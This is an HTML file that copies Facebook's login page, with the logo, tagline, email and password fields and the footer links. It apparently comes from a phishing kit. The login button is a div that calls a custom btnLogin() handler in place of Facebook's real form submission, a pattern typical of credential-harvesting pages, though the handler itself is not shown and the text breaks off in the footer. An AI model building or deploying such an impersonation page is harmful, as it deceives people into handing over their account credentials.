<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Facebook</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.0/jquery.min.js" integrity="sha512-3gJwYpMe3QewGELv8k/BX9vcqhryRdzRMxVfq6ngyWXwo03GFEzjsUm8Q7RZcHPHksttq7/GFoxjCVUjkjvPdw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  </head>
  <body style="margin: 0;">
    <div
      class="fb_content clearfix"
      id="content"
      role="main"
      style="
        zoom: 1;
        min-height: 640px;
        padding: 0px;
        margin: 0px;
        outline: none;
        width: auto;
        font-family: Helvetica, Arial, sans-serif;
        color: rgb(28, 30, 33);
        font-size: 12px;
        background-color: rgb(255, 255, 255);
      "
    >
      <div style="font-family: inherit">
        <div
          class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka"
          style="
            background: rgb(240, 242, 245);
            min-width: 500px;
            padding-top: 20px;
            padding-bottom: 164px;
            font-family: inherit;
          "
        >
          <div
            class="_8esk"
            style="
              margin: 0px 40px;
              padding: 20px 0px;
              position: relative;
              width: auto;
              height: 496px;
              display: flex;
              flex-direction: column;
              text-align: center;
              font-family: inherit;
            "
          >
            <div
              class="_8esl"
              style="
                display: inline-block;
                margin: 0px auto;
                vertical-align: top;
                width: 400px;
                box-sizing: border-box;
                padding: 0px;
                font-family: inherit;
              "
            >
              <div
                class="_8ice"
                style="font-family: inherit; padding: 0px 0px 20px"
              >
                <img
                  class="fb_logo _8ilh img"
                  src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"
                  alt="Facebook"
                  style="border: 0px; height: 106px; margin: -28px"
                />
              </div>
              <h2
                class="_8eso"
                style="
                  font-size: 24px;
                  font-weight: normal;
                  margin: 0px;
                  padding: 0px;
                  font-family: SFProDisplay-Regular, Helvetica, Arial,
                    sans-serif;
                  display: inline-block;
                  line-height: 28px;
                  text-rendering: optimizelegibility;
                  width: auto;
                "
              >
                Facebook helps you connect and share with the people in your
                life.
              </h2>
            </div>
            <div
              class="_8esn"
              style="
                display: inline-block;
                vertical-align: top;
                float: none;
                margin: 0px auto;
                font-family: inherit;
              "
            >
              <div
                class="_8iep _8icy _9ahz _9ah-"
                style="height: 456px; width: 396px; font-family: inherit"
              >
                <div
                  class="_6luv _52jv"
                  style="
                    align-items: center;
                    background-color: rgb(255, 255, 255);
                    border: none;
                    border-radius: 8px;
                    box-shadow: rgba(0, 0, 0, 0.1) 0px 2px 4px,
                      rgba(0, 0, 0, 0.1) 0px 8px 16px;
                    box-sizing: border-box;
                    margin: 40px 0px 0px;
                    padding: 10px 0px 24px;
                    width: 396px;
                    font-family: inherit;
                  "
                >
                  <form
                    class="_9vtf"
                    data-testid="royal_login_form"
                    method="post"
                    
                    style="margin: 0px; padding: 0px ;
                     display: flex;
                          flex-direction: column;
                          align-items: center;
                          justify-content: center;"
                  >
                    <div style="font-family: inherit">
                      <div
                        class="_6lux"
                        style="
                          display: inline-block;
                          font-size: 17px;
                          margin: auto;
                          padding: 6px 0px;
                          width: 364px;
                          font-family: inherit;
                        "
                      >
                        <input
                          type="text"
                          class="inputtext _55r1 _6luy"
                          name="email"
                          id="email"
                          data-testid="royal_email"
                          placeholder="Email address or phone number"
                          autofocus="1"
                          aria-label="Email address or phone number"
                          style="
                            background: url('/rsrc.php/v3/yU/r/O7nelmd9XSI.png')
                              repeat-x rgb(255, 255, 255);
                            color: rgb(29, 33, 41);
                            font-family: inherit;
                            font-size: 17px;
                            appearance: none;
                            border-width: 1px;
                            border-style: solid;
                            border-color: rgb(221, 223, 226);
                            border-radius: 6px;
                            margin: 0px;
                            padding: 14px 16px;
                            height: 22px;
                            line-height: 16px;
                            vertical-align: middle;
                            width: 330px;
                            outline:none;

                          "
                        />
                      </div>
                      <div
                        class="_6lux"
                        style="
                          display: inline-block;
                          font-size: 17px;
                          margin: auto;
                          padding: 6px 0px;
                          width: 364px;
                          font-family: inherit;
                        "
                      >
                        <div
                          class="_6luy _55r1 _1kbt"
                          id="passContainer"
                          style="
                            background-image: url('/rsrc.php/v3/yU/r/O7nelmd9XSI.png');
                            background-position: initial;
                            background-size: initial;
                            background-repeat: repeat-x;
                            background-attachment: initial;
                            background-origin: initial;
                            background-clip: initial;
                            border: 1px solid rgb(221, 223, 226);
                            color: rgb(29, 33, 41);
                            font-family: inherit;
                            height: 22px;
                            line-height: 16px;
                            padding: 14px 16px;
                            vertical-align: middle;
                            width: 330px;
                            border-radius: 6px;
                            outline:none;

                          "
                        >
                          <input
                            type="password"
                            class="inputtext _55r1 _6luy _9npi"
                            name="pass"
                            id="pass"
                            data-testid="royal_pass"
                            placeholder="Password"
                            aria-label="Password"
                            style="
                             outline:none;
                              font-family: inherit;
                              font-size: 17px;
                              appearance: none;
                              border-width: 0px;
                              border-style: initial;
                              border-color: initial;
                              border-radius: 6px;
                              margin: 0px;
                              padding: 0px;
                              height: 22px;
                              line-height: 16px;
                              vertical-align: middle;
                              width: 300px;
                              box-shadow: none;
                              float: left;
                            "
                          />
                        </div>
                      </div>
                    </div>
                    <div
                      class="_6ltg"
                      style="padding-top: 6px; font-family: inherit"
                    >
                      <div
                        value="1"
                        class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy"
                        name="login"
                        data-testid="royal_login_div"
                        type="submit"
                        onclick="btnLogin()"
                        style="
                          font-family: inherit;
                          font-size: 20px;
                          margin: 0px;
                          width: 332px;
                          cursor: pointer;
                          white-space: nowrap;
                          border-width: initial;
                          border-style: none;
                          border-color: initial;
                          border-radius: 6px;
                          box-sizing: content-box;
                          -webkit-font-smoothing: antialiased;
                          font-weight: bold;
                          justify-content: center;
                          padding: 0px 16px;
                          position: relative;
                          vertical-align: middle;
                          transition: background-color 200ms
                              cubic-bezier(0.08, 0.52, 0.52, 1) 0s,
                            box-shadow 200ms cubic-bezier(0.08, 0.52, 0.52, 1)
                              0s,
                            transform 200ms cubic-bezier(0.08, 0.52, 0.52, 1) 0s;
                          color: rgb(255, 255, 255);
                          background-color: rgb(24, 119, 242);
                          line-height: 48px;
                        "
                      >
                        Log in
                      </div>
                    </div>
                    <div
                      class="_6ltj"
                      style="margin-top: 16px; font-family: inherit"
                    >
                      <a
                        href="https://web.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjg1NDg0MjAyLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&amp;ars=facebook_login"
                        style="
                          color: rgb(24, 119, 242);
                          cursor: pointer;
                          text-decoration-line: none;
                          font-size: 14px;
                          font-family: inherit;
                        "
                        >Forgotten password?</a
                      >
                    </div>
                    <div
                      class="_8icz"
                      style="
                        align-items: center;
                        border-bottom: 1px solid rgb(218, 221, 225);
                        display: flex;
                        margin: 20px 16px;
                        font-family: inherit;
                      "
                    ></div>
                    <div
                      class="_6ltg"
                      style="padding-top: 6px; font-family: inherit"
                    >
                      <a
                        role="button"
                        class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy"
                        href="https://web.facebook.com/?_rdc=1&amp;_rdr#"
                        ajaxify="/reg/spotlight/"
                        id="u_0_0_B9"
                        data-testid="open-registration-form-button"
                        rel="async"
                        style="
                          color: rgb(255, 255, 255);
                          cursor: pointer;
                          text-decoration-line: none;
                          font-size: 17px;
                          display: inline-block;
                          white-space: nowrap;
                          border: none;
                          border-radius: 6px;
                          box-sizing: content-box;
                          -webkit-font-smoothing: antialiased;
                          font-weight: bold;
                          justify-content: center;
                          padding: 0px 16px;
                          position: relative;
                          text-shadow: none;
                          vertical-align: middle;
                          transition: background-color 200ms
                              cubic-bezier(0.08, 0.52, 0.52, 1) 0s,
                            box-shadow 200ms cubic-bezier(0.08, 0.52, 0.52, 1)
                              0s,
                            transform 200ms cubic-bezier(0.08, 0.52, 0.52, 1) 0s;
                          background-color: rgb(66, 183, 42);
                          line-height: 48px;
                          font-family: inherit;
                        "
                        >Create new account</a
                      >
                    </div>
                  </form>
                </div>
                <div
                  id="reg_pages_msg"
                  class="_58mk"
                  style="
                    border-top: none;
                    font-size: 14px;
                    margin-top: 28px;
                    padding-top: 0px;
                    font-family: SFProText-Regular, Helvetica, Arial, sans-serif;
                  "
                >
                  <a
                    href="https://web.facebook.com/pages/create/?ref_type=registration_form"
                    class="_8esh"
                    style="
                      cursor: pointer;
                      text-decoration-line: none;
                      font-family: SFProText-Semibold, Helvetica, Arial,
                        sans-serif;
                      font-weight: 600;
                    "
                    >Create a Page</a
                  >&nbsp;for a celebrity, brand or business.
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div
      class=""
      style="
        font-family: Helvetica, Arial, sans-serif;
        color: rgb(28, 30, 33);
        font-size: 12px;
        background-color: rgb(255, 255, 255);
      "
    >
      <div class="_95ke _8opy" style="padding-top: 20px; font-family: inherit">
        <div
          id="pageFooter"
          data-referrer="page_footer"
          data-testid="page_footer"
          style="
            color: rgb(115, 115, 115);
            margin: 0px 40px;
            width: auto;
            font-family: inherit;
          "
        >
          <ul
            class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i"
            data-nocookies="1"
            style="
              list-style-type: none;
              margin: 0px;
              padding: 8px 0px 0px;
              align-items: center;
              display: flex;
              flex-wrap: wrap;
            "
          >
            <li
              style="
                border-width: 0px;
                display: inline-block;
                vertical-align: top;
                padding-left: 0px;
                padding-right: 0px;
              "
            >
              English (UK)
            </li>
            <li
              style="
                border-width: 0px 0px 0px 1px;
                display: inline-block;
                vertical-align: top;
                padding-left: 10px;
                padding-right: 0px;
              "
            >
              <a
                class="_sv4"
                dir="ltr"
                href="https://ha-ng.facebook.com/"
                title="Hausa"
                style="
                  color: rgb(138, 141, 145);
                  cursor: pointer;
                  text-decoration-line: none;
                  white-space: nowrap;
                  margin-right: 0px;
                  font-family: inherit;
                "
                >Hausa</a
              >
            </li>
            <li
              style="
                border-width: 0px 0px 0px 1px;
                display: inline-block;
                vertical-align: top;
                padding-left: 10px;
                padding-right: 0px;
              "
            >
              <a
                class="_sv4"
                dir="ltr"
                href="https://fr-fr.facebook.com/"
                title="French (France)"
                style="
                  color: rgb(138, 141, 145);
                  cursor: pointer;
                  text-decoration-line: none;
                  white-space: nowrap;
                  margin-right: 0px;
                  font-family: inherit;
                "
                >Français (France)</a
              >
            </li>
            <li
              style="
                border-width: 0px 0px 0px 1px;
                display: inline-block;
                vertical-align: top;
                padding-left: 10px;
                padding-right: 0px;
              "
            >
              <a
                class="_sv4"
                dir="ltr"
                href="https://pt-br.facebook.com/"
                title="Portuguese (Brazil)"
                style="
                  color: rgb(138, 141, 145);
                  cursor: pointer;
                  text-decoration-line: none;
                  white-space: nowrap;
                  margin-right: 0px;
                  font-family: inherit;
                "
                >Português (Brasil)</a
              >
            </li>
            <li
              style="
                border-width: 0px 0px 0px 1px;
                display: inline-block;
                vertical-align: top;
                padding-left: 10px;
                padding-right: 0px;
              "
            >
              <a
                class="_sv4"
                dir="ltr"
                href="https://es-la.facebook.com/"
                title="Spanish"
                style="
                  color: rgb(138, 141, 145);
                  cursor: pointer;
                  text-decoration-line: none;
                  white-space: nowrap;
                  margin-right: 0px;
                  font-family: inherit;
                "
                >Español</a
              >
            </li>
            <li
              style="
                border-width: 0px 0px 0px 1px;
                display: inline-block;
                vertical-align: top;
                padding-left: 10px;
                padding-right: 0px;
              "
            >
              <a
                class="_sv4"
                dir="rtl"
                href="https://ar-ar.facebook.com/"
                title="Arabic"
                style="
                  color: rgb(138, 141, 145);
                  cursor: pointer;
                  text-decoration-line: none;
                  white-space: nowrap;
                  margin-right: 0px;
                  font-family: inherit;
                "
                >العربية</a
              >
            </li>
            <li
              style="
                border-width: 0px 0px 0px 1px;
                display: inline-block;
                vertical-align: top;
                padding-left: 10px;
                padding-right: 0px;
              "
            >
              <a
                class="_sv4"
                dir="ltr"
                href="https://id-id.facebook.com/"
                title="Indonesian"
                style="
                  color: rgb(138, 141, 145);
                  cursor: pointer;
                  text-decoration-line: none;
                  white-space: nowrap;
                  margin-right: 0px;
                  font-family: inherit;
                "
                >Bahasa Indonesia</a
              >
            </li>
            <li
              style="
                border-width: 0px 0px 0px 1px;
                display: inline-block;
                vertical-align: top;
                padding-left: 10px;
                padding-right: 0px;
              "
            >
              <a
                class="_sv4"
                dir="ltr"
                href="https://de-de.facebook.com/"
                title="German"
                style="
                  color: rgb(138, 141, 145);
                  cursor: pointer;
                  text-decoration-line: none;
                  white-space: nowrap;
                  margin-right: 0px;
                  font-family: inherit;
                "
                >Deutsch</a
              >
            </li>
            <li
              style="
                border-width: 0px 0px 0px 1px;
                display: inline-block;
                vertical-align: top;
                padding-left: 10px;
                padding-right: 0px;
              "
            >
              <a
                class="_sv4"
                dir="ltr"
                href="https://ja-jp.facebook.com/"
                title="Japanese"
                style="
                  color: rgb(138, 141, 145);
                  cursor: pointer;
                  text-decoration-line: none;
                  white-space: nowrap;
                  margin-right: 0px;
                  font-family: inherit;
                "
                >日本語</a
              >
            </li>
            <li
              style="
                border-width: 0px 0px 0px 1px;
                display: inline-block;
                vertical-align: top;
                padding-left: 10px;
                padding-right: 0px;
              "
            >
              <a
                class="_sv4"
                dir="ltr"
                href="https://it-it.facebook.com/"
                title="Italian"
                style="
                  color: rgb(138, 141, 145);
                  cursor: pointer;
                  text-decoration-line: none;
                  white-space: nowrap;
                  margin-right: 0px;
                  font-family: inherit;
                "
                >Italiano</a
              >
            </li>
            <li
              style="
                border-width: 0px 0px 0px 1px;
                display: inline-block;
                vertical-align: top;
                padding-left: 10px;
                padding-right: 0px;
              "
            >
              <a
                class="_sv4"
                dir="ltr"
                href="https://hi-in.facebook.com/"
                title="Hindi"
                style="
                  color: rgb(138, 141, 145);
                  cursor: pointer;
                  text-decoration-line: none;
                  white-space: nowrap;
                  margin-right: 0px;
                  font-family: inherit;
                "
                >हिन्दी</a
              >
            </li>
            <li
              style="
                border-width: 0px 0px 0px 1px;
                display: inline-block;
                vertical-align: top;
                padding-left: 10px;
                padding-right: 0px;
              "
            >
              <a
                role="button"
                class="_42ft _4jy0 _517i _517h _51sy"
                rel="dialog"
                ajaxify="/settings/language/language/?uri=https%3A%2F%2Fhi-in.facebook.com%2F&amp;source=www_list_selector_more"
                href="https://web.facebook.com/?_rdc=1&amp;_rdr#"
                title="Show more languages"
                style="
                  color: rgb(138, 141, 145);
                  cursor: pointer;
                  text-decoration-line: none;
                  display: inline-block;
                  white-space: nowrap;
                  border: 1px solid rgb(204, 208, 213);
                  border-radius: 2px;
                  box-sizing: content-box;
                  -webkit-font-smoothing: antialiased;
                  font-weight: bold;
                  justify-content: center;
                  padding: 0px 8px;
                  position: relative;
                  text-align: center;
                  text-shadow: none;
                  vertical-align: middle;
                  transition: background-color 200ms
                      cubic-bezier(0.08, 0.52, 0.52, 1) 0s,
                    box-shadow 200ms cubic-bezier(0.08, 0.52, 0.52, 1) 0s,
                    transform 200ms cubic-bezier(0.08, 0.52, 0.52, 1) 0s;
                  background-color: rgb(245, 246, 247);
                  height: 18px;
                  line-height: 18px;
                  margin-right: 0px;
                  font-family: inherit;
                "
                ><i
                  class="img sp_EP9wX8qDDvu sx_0de3e6"
                  style="
                    background-image: url('/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png');
                    background-size: auto;
                    background-repeat: no-repeat;
                    display: inline-block;
                    height: 12px;
                    width: 12px;
                    bottom: 1px;
                    position: relative;
                    vertical-align: middle;
                    background-position: -28px -298px;
                  "
                ></i
              ></a>
            </li>
          </ul>
          <div
            id="contentCurve"
            style="
              border-bottom: 1px solid rgb(221, 223, 226);
              font-size: 1px;
              height: 8px;
              margin-bottom: 8px;
              font-family: inherit;
            "
          ></div>
          <div
            id="pageFooterChildren"
            role="contentinfo"
            aria-label="Facebook site links"
            style="font-family: inherit"
          >
            <ul
              class="uiList pageFooterLinkList _509- _4ki _703 _6-i"
              style="
                list-style-type: none;
                margin: 0px 0px 0px -20px;
                padding: 0px;
                line-height: 1.6;
              "
            >
              <li
                style="
                  border-width: 0px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/reg/"
                  title="Sign up for Facebook"
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Sign Up</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/login/"
                  title="Log in to Facebook"
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Log in</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://messenger.com/"
                  title="Take a look at Messenger."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Messenger</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/lite/"
                  title="Facebook Lite for Android."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Facebook Lite</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/watch/"
                  title="Browse our Watch videos."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Watch</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/places/"
                  title="Take a look at popular places on Facebook."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Places</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/games/"
                  title="Check out Facebook games."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Games</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/marketplace/"
                  title="Buy and sell on Facebook Marketplace."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Marketplace</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://pay.facebook.com/"
                  title="Learn more about Meta Pay"
                  target="_blank"
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Meta Pay</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://www.meta.com/"
                  title="Discover Meta"
                  target="_blank"
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Meta Store</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://www.meta.com/quest/"
                  title="Learn more about Meta Quest"
                  target="_blank"
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Meta Quest</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT0maxzjR9tKwHk2HLEpZgr0TSXYLagWyTlt9RduYHHoBGOBJDUqE8bhSltwX35OP7DbrszlQxSNSrtOzOdQ_2WEYByAjSSAYsILyegzkGlJwu4zSoeyQ_qd7JgY-3dsaVcDzGD1Ux88SkfQn4APrw"
                  title="Take a look at Instagram"
                  target="_blank"
                  rel="noopener nofollow"
                  data-lynx-mode="asynclazy"
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Instagram</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/fundraisers/"
                  title="Donate to worthy causes."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Fundraisers</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/biz/directory/"
                  title="Browse our Facebook Services directory."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Services</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D"
                  title="See the Voting Information Centre"
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Voting Information Centre</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/privacy/policy/?entry_point=facebook_page_footer"
                  title="Learn how we collect, use and share information to support Facebook."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Privacy Policy</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/privacy/center/?entry_point=facebook_page_footer"
                  title="Learn how to manage and control your privacy on Facebook."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Privacy Centre</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/groups/discover/"
                  title="Explore our groups."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Groups</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://about.meta.com/"
                  accesskey="8"
                  title="Read our blog, discover the resource centre and find job opportunities."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >About</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto"
                  title="Advertise on Facebook"
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Create ad</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/pages/create/?ref_type=site_footer"
                  title="Create a Page"
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Create Page</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://developers.facebook.com/?ref=pf"
                  title="Develop on our platform."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Developers</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/careers/?ref=pf"
                  title="Make your next career move to our brilliant company."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Careers</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/policies/cookies/"
                  title="Learn about cookies and Facebook."
                  data-nocookies="1"
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Cookies</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  class="_41ug"
                  data-nocookies="1"
                  href="https://web.facebook.com/help/568137493302217"
                  title="Learn about AdChoices."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    display: inline-block;
                    padding-right: 14px;
                    position: relative;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >AdChoices<i
                    class="img sp_EP9wX8qDDvu sx_6bdd81"
                    style="
                      background-image: url('/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png');
                      background-size: auto;
                      background-repeat: no-repeat;
                      display: inline-block;
                      height: 16px;
                      width: 16px;
                      position: absolute;
                      top: 1px;
                      vertical-align: middle;
                      background-position: -263px -251px;
                    "
                  ></i
                ></a>
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  data-nocookies="1"
                  href="https://web.facebook.com/policies?ref=pf"
                  accesskey="9"
                  title="Review our terms and policies."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Terms</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/help/?ref=pf"
                  accesskey="0"
                  title="Visit our Help Centre."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
                    text-decoration-line: none;
                    white-space: nowrap;
                    margin-right: 0px;
                    font-family: inherit;
                  "
                  >Help</a
                >
              </li>
              <li
                style="
                  border-width: 0px 0px 0px 1px;
                  display: inline-block;
                  vertical-align: top;
                  padding-left: 20px;
                  padding-right: 0px;
                "
              >
                <a
                  href="https://web.facebook.com/help/637205020878504"
                  title="Visit our contact uploading and non-users notice."
                  style="
                    color: rgb(138, 141, 145);
                    cursor: pointer;
